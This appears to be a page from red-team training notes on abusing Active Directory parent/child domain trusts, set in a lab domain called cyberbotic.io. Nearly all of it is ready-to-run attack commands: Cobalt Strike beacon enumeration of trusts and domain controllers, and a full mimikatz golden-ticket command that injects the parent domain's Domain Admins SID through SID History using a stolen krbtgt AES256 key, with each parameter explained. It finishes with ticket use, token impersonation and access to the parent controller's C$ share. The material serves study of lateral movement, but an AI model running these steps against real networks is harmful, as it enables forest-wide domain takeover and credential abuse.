Parent/Child

beacon> powershell Get-DomainTrust

beacon> powershell Get-DomainGroup -Identity "Domain Admins" -Domain cyberbotic.io -Properties ObjectSid

beacon> powershell Get-DomainController -Domain cyberbotic.io | select Name

If you have domain admins rights in the parent/child you can also have domain admin rights in the other parent/child through SID History feature.

mimikatz # kerberos::golden /user:Administrator /domain:dev.cyberbotic.io /sid:S-1-5-21-3263068140-2042698922-2891547269 /sids:S-1-5-21-378720957-2217973887-3501892633-512 /aes256:390b2fdb13cc820d73ecf2dadddd4c9d76425d4c2156b89ac551efb9d591a8aa /startoffset:-10 /endin:600 /renewmax:10080 /ticket:cyberbotic.kirbi

Where:

  • /user is the username to impersonate.

  • /domain is the current domain.

  • /sid is the current domain SID.

  • /sids is the SID of the target group to add ourselves to.

  • /aes256 is the AES256 key of the current domain's krbtgt account.

  • /startoffset sets the start time of the ticket to 10 mins before the current time.

  • /endin sets the expiry date for the ticket to 60 mins.

  • /renewmax sets how long the ticket can be valid for if renewed.

beacon> make_token CYBER\Administrator FakePass
[+] Impersonated DEV\bfarmer

beacon> kerberos_ticket_use C:\Users\Administrator\Desktop\cyberbotic.kirbi
beacon> ls \\dc-1\c$

beacon> rev2self
PreviousForest & Domain TrustsNextOne Way (Inbound)

Last updated